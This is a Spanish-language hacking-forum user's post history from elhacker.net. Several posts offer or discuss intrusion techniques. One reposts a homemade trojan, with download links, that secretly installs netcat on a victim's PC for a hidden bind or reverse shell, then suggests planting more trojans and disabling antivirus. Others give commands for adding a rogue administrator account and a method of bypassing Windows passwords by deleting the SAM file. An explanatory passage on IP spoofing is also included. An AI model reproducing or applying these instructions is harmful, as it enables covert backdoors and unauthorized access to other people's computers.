elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 [4]
31  Foros Generales / Sugerencias y dudas sobre el Foro / LA PAGINA NO ESTA FUNCIONANDO BIEN? en: 9 Julio 2005, 12:12 pm
Tengo problemas cada tanto a contactar la pagina! que pasa?
Me lo hace solo per algunas horas, no es mi PC ni la conexion que uso, porque me pasa solo con esta pagina, y si prubo con un PROXY ANONYMOUS me da el mismo problema, asi que no es mi conexion,sino me haria ver el el proxy la pagina :)
Bueno queria solo avisar!
Bye
32  Seguridad Informática / Hacking / Re: Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 5 Julio 2005, 12:39 pm
LEE TODO DENUEVO, TE PERDISTE ALGUN PASO!
PONGO ACA LO QUE PUSO EL CREADOR DEL TROYAN.

holas mi nick real es ^Nous^ pero se me fue la pinza al registrarme xDD.
weno he hecho una kutrada pa instalar el netcat al pardillo de turno, lo que hace este prog es bajarse el nc de una web, instalarlo en el directorio del  sistema y que se inicie siempre que se arranke win.
tambien trae un edit server para elegir si kieres simplemente abrirle un puerto a la victima y conectarte o si prefieres que se te conecte el por reverse shelll.
un fallo que tiene es que solo funciona si editas el server una sola vez, la 2ª ya no lo guarda, asike mejor que no os ekibokeis o simpelemente borrais la karpeta y deskompriimis otra vez, asi ya podeis volver a editar el server, el q x cierto esta comprimido en upx.

ya solo decir que el diseño es mas que kutre xDDD pero que kieres si lo he hecho en 15-20mins.

enlace: http://www.gratisweb.com/nc2k5/NetCaTroyanBy^Nous^.rar


ale ya podeis ponerme verde x esta p**a bazofia xD.

weno ya sabreis que despues de que le paseis el server al tio no tendreis shell hasta que no reinicie xq no he puesto pa que se ejecute el netcat ... jeje y paso de hacer que se reinicie el pc despues de descargar el netcat xq sino canta mucho. despues si eso esta noche hago que se ejecute el netcat despues de ser descargado y asi no tener que esperar a que reinicien el pc... como ya todos sabreis despues con la shell podeis subir vuestros troyanos o haceros un user  detener AVs y firewalls.... xao.
***********************************************************************
***********************************************************************
na pos mu facil, si has elegido reverse shell, kuando le mandes el server, el programa te abrira el solo dos nc a la escucha en tu pc para que su nc se konecte al tuyo y ya tienes shell, por uno de los nc recibiras la informacion y x el otro la enviaras.
si has elegido abrir un puerto pos simplemente abres tu nc, pones nc -vv ipvictima puerto y te conectas, y ya tienes shell.

una vez dentro ya sabes puedes subir troyanos krear users etc etc etc.

tambien estoy pensando en poner una opcion para que se ejecute una shell inversa a una hora determinada del dia.... no se

**la shell se ejecuta en segundo plano, oculto vamos
**na pos mu facil, si has elegido reverse shell, kuando le mandes el server, el programa te abrira el solo dos nc a la escucha en tu pc para que su nc se konecte al tuyo y ya tienes shell, por uno de los nc recibiras la informacion y x el otro la enviaras.
si has elegido abrir un puerto pos simplemente abres tu nc, pones nc -vv ipvictima puerto y te conectas, y ya tienes shell.

una vez dentro ya sabes puedes subir troyanos krear users etc etc etc
**bueno ya esta un poco mejorado, ya lo podeis user, podeis renombrar el server.exe como kerais, otra kosa, tendreis que subir el netcat, osea el nc.exe a el servidor que kerais y indicarlo en el programa. Otra cosa, solo se puede editar el server una vez, asike si lo kereis editar mas veces borrais la karpeta y volveis a descomprimir. aver si pa la siguiente version corrijo ese fallo y consigo poner lo de sell inversa a una determinada hora del dia.

descargar http://venus.walagata.com/w/nc2k5/1401581.rar
************************************************
Espero que sea Util!
Asi leen todo junto! y no preguntan lo mismo siempre!
Bye

33  Seguridad Informática / Hacking / Re: Como hackear una maquina en una red que pasa por un router en: 1 Abril 2005, 11:17 am
Bueno a ver que me organice y no me deje nada por contarles.

TigreDARK no entiendo muy bien cuál es tu intención al hacer spoofing de paquetes TCP/IP, si puedes explicarlo de nuevo te lo agradecería.

Un saludo

Lee esto (no escrito por mi obviamente jaja)

Spoofing
Por spoofing se conoce a la creación de tramas TCP/IP utilizando una dirección IP falseada; la idea de este ataque - al menos la idea - es muy sencilla: desde su equipo, un pirata simula la identidad de otra máquina de la red para conseguir acceso a recursos de un tercer sistema que ha establecido algún tipo de confianza basada en el nombre o la dirección IP del host suplantado. Y como los anillos de confianza basados en estas características tan fácilmente falsificables son aún demasiado abundantes (no tenemos más que pensar en los comandos r-, los accesos NFS, o la protección de servicios de red mediante TCP Wrapper), el spoofing sigue siendo en la actualidad un ataque no trivial, pero factible contra cualquier tipo de organización.

Como hemos visto, en el spoofing entran en juego tres máquinas: un atacante, un atacado, y un sistema suplantado que tiene cierta relación con el atacado; para que el pirata pueda conseguir su objetivo necesita por un lado establecer una comunicación falseada con su objetivo, y por otro evitar que el equipo suplantado interfiera en el ataque ([HB96]). Probablemente esto último no le sea muy difícil de conseguir: a pesar de que existen múltiples formas de dejar fuera de juego al sistema suplantado - al menos a los ojos del atacado - que no son triviales (modificar rutas de red, ubicar un filtrado de paquetes entre ambos sistemas...), lo más fácil en la mayoría de ocasiones es simplemente lanzar una negación de servicio contra el sistema en cuestión. Aunque en el punto siguiente hablaremos con más detalle de estos ataques, no suele ser difícil `tumbar', o al menos bloquear parcialmente, un sistema medio; si a pesar de todo el atacante no lo consigue, simplemente puede esperar a que desconecten de la red a la máquina a la que desea suplantar (por ejemplo, por cuestiones de puro mantenimiento).

El otro punto importante del ataque, la comunicación falseada entre dos equipos, no es tan inmediato como el anterior y es donde reside la principal dificultad del spoofing. En un escenario típico del ataque, un pirata envía una trama SYN a su objetivo indicando como dirección origen la de esa tercera máquina que está fuera de servicio y que mantiene algún tipo de relación de confianza con la atacada. El host objetivo responde con un SYN+ACK a la tercera máquina, que simplemente lo ignorará por estar fuera de servicio (si no lo hiciera, la conexión se resetearía y el ataque no sería posible), y el atacante enviará ahora una trama ACK a su objetivo, también con la dirección origen de la tercera máquina. Para que la conexión llegue a establecerse, esta última trama deberá enviarse con el número de secuencia adecuado; el pirata ha de predecir correctamente este número: si no lo hace, la trama será descartada), y si lo consigue la conexión se establecerá y podrá comenzar a enviar datos a su objetivo, generalmente para tratar de insertar una puerta trasera que permita una conexión normal entre las dos máquinas.

Podemos comprobar que el spoofing no es inmediato; de entrada, el atacante ha de hacerse una idea de cómo son generados e incrementados los números de secuencia TCP, y una vez que lo sepa ha de conseguir `engañar' a su objetivo utilizando estos números para establecer la comunicación; cuanto más robusta sea esta generación por parte del objetivo, más difícil lo tendrá el pirata para realizar el ataque con éxito. Además, es necesario recordar que el spoofing es un ataque ciego: el atacante no ve en ningún momento las respuestas que emite su objetivo, ya que estas van dirigidas a la máquina que previamente ha sido deshabilitada, por lo que debe presuponer qué está sucediendo en cada momento y responder de forma adecuada en base a esas suposiciones. Sería imposible tratar con el detenimiento que merecen todos los detalles relativos al spoofing por lo que para obtener información adicional es necesario dirigirse a excelentes artículos que estudian todos los pormenores del ataque, como [Dae96] o [HB96]; de la misma forma, para conocer con detalle el funcionamiento del protocolo TCP/IP y sus problemas podemos consultar [Ste94], [Tan96], [Bel89] y [Mor85].

Para evitar ataques de spoofing exitosos contra nuestros sistemas podemos tomar diferentes medidas preventivas; en primer lugar, parece evidente que una gran ayuda es reforzar la secuencia de predicción de números de secuencia TCP: un esquema de generación robusto puede ser el basado en [Bel96], que la mayoría de Unices son capaces de implantar (aunque muchos de ellos no lo hagan por defecto). Otra medida sencilla es eliminar las relaciones de confianza basadas en la dirección IP o el nombre de las máquinas, sustituyéndolas por relaciones basadas en claves criptográficas; el cifrado y el filtrado de las conexiones que pueden aceptar nuestras máquinas también son unas medidas de seguridad importantes de cara a evitar el spoofing.

///////////////////////////////////

Aver si ahora entendes mejor loq ue queria decir! :)
Hacer un spoofing para que los paquetes falseados pasen atraves del router hacia la maquina que quieres hackear.

/////////////////////////////////
Otra definicion de SPOOFING:


El Spoofing

El IP Spoofing consiste en enviar un paquete IP con la dirección de origen falseada, de forma que el destinatario crea que proviene de otra localización. Esta técnica puede emplearse para muchas cosas, entre otras para un ataque DoS.

Sin embargo, el IP spoofing no es una técnica cuyo éxito dependa única y exclusivamente de quién emite el paquete. Es decir, nosotros podemos mandar un paquete con una dirección de origen falseada, pero ese paquete no llegar nunca a su destino.

En redes grandes (como Internet) existen muchos dispositivos de red que pueden realizar filtrados al tráfico que gestionan. Uno de esos filtros es precisamente la comprobación de la IP de origen. Los dispositivos a los que me refiero son los de siempre:

cortafuegos
routers
conmutadores
Servidores de acceso


Esto es para que tengas una idea de lo que hablaba yo :)
Luego volve a leerlo avr si entendes mejor, sino avisame, igualmente es hacer un spoofing para entrar en el router, claro que como veras hay que saber lo que haces ... crear paquetes TCP/IP no es algo facil....
34  Seguridad Informática / Hacking / Re: Como hackear una maquina en una red que pasa por un router en: 31 Marzo 2005, 11:10 am
Bueno aunque el tema del post no se corresponda con la pregunta. Me gustaría saber un poco las ideas que tienen sobre como hackear un PCA (que está en una red lan y se conecta a través de un router) desde un PCB remoto a esa red (el nuestro-atacante).

Ya me he leído la teoría de que todos los ordenadores de una red tienen cada su propia IP privada (que generalmente es del tipo 192.168.1.x por convenio) y cuando se conectan a través de un router (server o puente) utilizan todos la misma IP pública que el ISP proporciona a este router. Cuando sacamos la IP de un ordenador en una red a través de internet obtenemos esta IP pública mediante la cual no se puede acceder al ordenador.

En el post sobre conceptos básicos en routers de windows (Chincheta - tema redes) se dice que un router bien configurado funciona a la práctica como un firewall debido a sus reglas de filtrado. Habitualmente los routers son conocidos como el enemigo de los principiantes, y sin embargo no vi ningún post de como saltar el router (quizás miré mal)


Hola que tal, mira yo estoy viendo esto de hace bastante tiempo, solo que 1) No tengo los conocimientos avanzados como para hacer eso.
2)Deberia estudiarme el TCP/IP profundamente.
3)Luego si podri ahacer algo!
A que se debe eso del TCP/IP? que tenes que construirte MANUALMENTE los paquetes.... enviar paquetes de peticiones, y asi poder hacerlos pasar por otra cosa que no son, eso se puede hacer.... el pequeño detalle es que para saber eso, tenes que saber como construir un paquete TCP/IP :)
Me he bajado programas para hacer eso, solo que no entendi ni medio :) jaja, no bueno, no es que no entendi, solo que no es facil construirse los pquetes, porque tenes que saber tambien que pedir.
Como cuando haces un pedido de una pagina web, haces un GET del HTTP, lo mismo para cada cosa.... hacer un spoofing de paquetes no es tan facil!  :-\ .
El NAT bloquea los paquetes que no fueron requeridos desde el interno, como si fuese un firewall (solo que no lo es!), no es difisilisimo pasar la NAT, porque se que se puede y que no es complicado! pero lamentablemente cuando sabes poco, todo es complicado  ;D

Para pasar un router hay que o poner un virus/troian, o tenes que tener acceso al router para redireccionar los paquetes (ya que manulamente no sos capas (yp tampoco!) ).

Hay varios trojan/virus que podes encontrar ne la NET, el problema es que si no lo ejecutan o tienen antivirus (quien no tiene antivirus hoy en dia? sobretodo quien queres atacar jaja).
Asi que ya veras!! esta es mi experiencia, dentro de no mucho (y si me saco la loteria mejor!), hare cursos de CCNA y Seguridad Informatica! ya que trabajo con computacion hace ya 4 años! y configuro firewalls y routers :)

Suerte, y si llegas a encontrar algo bueno, avisa ;)


35  Seguridad Informática / Hacking / Re: RETO DE SEGURIDAD en: 14 Diciembre 2004, 21:26 pm
a ver , explicare mi caso brevemente. Existe una boveda de seguridad (por llamarlo asi) la cual se abre con una clave de acceso, esta misma se ejecuta en un computador que esta a 50 cms de la puerta de la "boveda", yo tengo acceso fisico a la computadora pero solamente por 4 o 5  minutos. Bueno, quisiera saber si puedo conseguir algun programa para obtener el codigo en ese lapso de tiempo o bien puedo obtener el codigo de otra manera?, gracias por sus posts.....

Aca los amigos tienen razon, no sabemos de que hablas....
Es como querer robar algo que vuela, pero no se sabe si es un elicoptero, o un avion o un caza o que?.... nadie sabe volar todos tipo de cosa que vuela! tomalo asi, asi ver si entendes porque te hacemos tantas preguntas! y porque si no das muchas informaciones no podemos responderte......
bye bye
36  Seguridad Informática / Hacking / Re: Un reto interesante....... a ver quién se le mide en: 10 Diciembre 2004, 05:41 am
Disculpa Man-In-the-Middle pero tengo algunas dudas sobre lo que le explicaste a nuestro amigo, creo que hay algo que no se entiende bien! (almenos yo no lo entenderia!). Y quiero contrubuir con mi granito de arena  ;D

si noe stas como admin, tonces
pones

c:\net user tu user tu pass /add

c:\net localgroup administradores(tator) tu user /add

net localgroup administradores(tator)

(tator) = adminisTRATOR???

Citar

eso es para saber que mauinas estan conectadas, , de ahi le haces un ping a tu servidor

y ves que numero de ip tiene

C:\1>ping shadow

Haciendo ping a shadow [10.10.20.145] con 32 bytes de datos:

Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128
Respuesta desde 10.10.20.145: bytes=32 tiempo<10ms TTL=128

Estadísticas de ping para 10.10.20.145:
    Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% perdidos),
Tiempos aproximados de recorrido redondo en milisegundos:
    mínimo = 0ms, máximo =  0ms, promedio =  0ms

Disculpa pero no le explicaste a que te referis con SHADOW, ya que no es un COMANDO, y no esta en ninguna parte del pequeño manual que hiciste! (que te felicito por tu tiempo y ganas de hacerlo!).

Supongo que con shadow te referias al nombre de NETBIOS de la maquina SERVER de nuestro amigo!  ???

En pocas palabras lo que encontrara nuestro amigo en Recursos de Red, ahi tendras todas las pc que ves, cada nombre que ves se le puede hacer un ping y te dara su IP como te enseño Man-In... aca arriba!

Citar

de ahi rulas el kath asi

c:\3 10.10.20.144  10.10.20.145

c:\3 ????????? el 3 por que???????? que es 3???? error de digitacion????
10.10.20.144 (este seria la IP de la maquina de nuestro amigo???)
10.10.20.145 = Ip server
37  Informática / Tutoriales - Documentación / Re: Contraseñas admin en Windows XP/NT en: 9 Diciembre 2004, 19:51 pm
Disculpen mi ignorancia, tengo un problema similar, acabo de comprar una computadora, pero los que me la arreglaron cambiaron mi clave que tenia de administrador a una de usuario y no puedo bajar las actualizaciones criticas, no quiero hacerme dependiente de estos crabrones, por lo que quiero cambiar todas las contraseñas que hay en la compu y darme de alta como administrador, ¿como le hago?
Hola, es muy facil, entras con el Disco 1 que dio chico y utilizas el NTFDOS ahi buscas el file SAM y lo borras (si no confias en mi copialo en un disket!) el file se encuentra en c:\windows\system32\config

Borras el file sam, reinicias la PC, y entras sin password :)
Esto sirve sea en Win2k que en WinXP
ah me olvidaba,luego que te logues, podes cambiar la password a la que vos queres!
Y si queres saber la password que pusieron ellos, necesitas hacer lo que dice CHICO paso a paso! (que verdaderamente lo explico muy bien!)
gracias chico :)
Páginas: 1 2 3 [4]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines